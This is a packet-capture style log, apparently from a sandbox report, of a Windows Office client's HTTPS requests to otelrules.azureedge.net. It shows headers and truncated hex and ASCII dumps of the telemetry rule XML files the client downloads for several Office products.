                2024-10-07 01:27:04 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2


                Session IDSource IPSource PortDestination IPDestination Port
                123192.168.2.44987013.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:27:04 UTC192OUTGET /rules/rule702301v1s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:27:04 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:27:04 GMT
                Content-Type: text/xml
                Content-Length: 1399
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT
                ETag: "0x8DC582BE976026E"
                x-ms-request-id: 4d8e59a4-701e-0021-64fe-163d45000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012704Z-1657d5bbd48p2j6x2quer0q02800000002z000000000eqz0
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:27:04 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr


                Session IDSource IPSource PortDestination IPDestination Port
                124192.168.2.44987113.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:27:04 UTC192OUTGET /rules/rule702300v1s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:27:04 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:27:04 GMT
                Content-Type: text/xml
                Content-Length: 1362
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                ETag: "0x8DC582BDC13EFEF"
                x-ms-request-id: 4ef38422-401e-000a-160c-174a7b000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012704Z-1657d5bbd48xlwdx82gahegw4000000002zg00000000dt24
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:27:04 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">


                Session IDSource IPSource PortDestination IPDestination Port
                125192.168.2.44987213.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:27:04 UTC192OUTGET /rules/rule703401v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:27:04 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:27:04 GMT
                Content-Type: text/xml
                Content-Length: 1425
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                ETag: "0x8DC582BE6BD89A1"
                x-ms-request-id: c326dec7-201e-0003-0c12-17f85a000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012704Z-1657d5bbd482krtfgrg72dfbtn00000002m0000000006mhw
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:27:04 UTC1425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus


                Session IDSource IPSource PortDestination IPDestination Port
                126192.168.2.44987313.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:27:04 UTC192OUTGET /rules/rule703400v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:27:04 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:27:04 GMT
                Content-Type: text/xml
                Content-Length: 1388
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                ETag: "0x8DC582BDBD9126E"
                x-ms-request-id: 75ef523f-601e-000d-02f2-162618000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012704Z-1657d5bbd48762wn1qw4s5sd3000000002n000000000gxs3
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:27:04 UTC1388INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M


                Session IDSource IPSource PortDestination IPDestination Port
                127192.168.2.44987413.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:27:05 UTC192OUTGET /rules/rule702501v1s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:27:05 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:27:05 GMT
                Content-Type: text/xml
                Content-Length: 1415
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT
                ETag: "0x8DC582BE7C66E85"
                x-ms-request-id: cad35e9e-b01e-0021-3602-17cab7000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012705Z-1657d5bbd48q6t9vvmrkd293mg00000002rg00000000gpqk
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:27:05 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                Session IDSource IPSource PortDestination IPDestination Port
                128192.168.2.44987513.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:27:05 UTC192OUTGET /rules/rule702500v1s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:27:05 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:27:05 GMT
                Content-Type: text/xml
                Content-Length: 1378
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                ETag: "0x8DC582BDB813B3F"
                x-ms-request-id: 87e265fd-201e-0051-4fe7-167340000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012705Z-1657d5bbd48762wn1qw4s5sd3000000002h000000000w92v
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:27:05 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />


                Session IDSource IPSource PortDestination IPDestination Port
                129192.168.2.44987613.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:27:05 UTC192OUTGET /rules/rule700501v1s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:27:05 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:27:05 GMT
                Content-Type: text/xml
                Content-Length: 1405
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT
                ETag: "0x8DC582BE89A8F82"
                x-ms-request-id: c9f5e5fc-201e-0071-5dfe-16ff15000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012705Z-1657d5bbd48cpbzgkvtewk0wu000000002sg00000000s5dw
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:27:05 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                Session IDSource IPSource PortDestination IPDestination Port
                130192.168.2.44987713.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:27:05 UTC192OUTGET /rules/rule700500v1s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:27:05 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:27:05 GMT
                Content-Type: text/xml
                Content-Length: 1368
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                ETag: "0x8DC582BE51CE7B3"
                x-ms-request-id: 3e7839e3-701e-0053-5cff-163a0a000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012705Z-1657d5bbd48f7nlxc7n5fnfzh0000000029g00000000zp9n
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:27:05 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 6f 77 65 72 50 6f 69 6e 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=


                Session IDSource IPSource PortDestination IPDestination Port
                131192.168.2.44987813.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:27:05 UTC192OUTGET /rules/rule702551v1s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:27:05 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:27:05 GMT
                Content-Type: text/xml
                Content-Length: 1415
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                ETag: "0x8DC582BDCE9703A"
                x-ms-request-id: c7b470af-b01e-005c-24fe-164c66000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012705Z-1657d5bbd48xdq5dkwwugdpzr0000000035g000000005tmv
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:27:05 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                Session IDSource IPSource PortDestination IPDestination Port
                132192.168.2.44987913.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:27:06 UTC192OUTGET /rules/rule702550v1s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:27:06 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:27:06 GMT
                Content-Type: text/xml
                Content-Length: 1378
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                ETag: "0x8DC582BE584C214"
                x-ms-request-id: dfa7567c-f01e-003f-67de-16d19d000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012706Z-1657d5bbd48f7nlxc7n5fnfzh000000002a000000000trhr
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:27:06 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPersonalization" S="Medium" />


                Session IDSource IPSource PortDestination IPDestination Port
                133192.168.2.44988013.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:27:06 UTC192OUTGET /rules/rule701351v1s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:27:06 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:27:06 GMT
                Content-Type: text/xml
                Content-Length: 1407
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                ETag: "0x8DC582BE687B46A"
                x-ms-request-id: 20e89b60-501e-008c-3a03-17cd39000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012706Z-1657d5bbd48jwrqbupe3ktsx9w00000002vg00000000ywgm
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
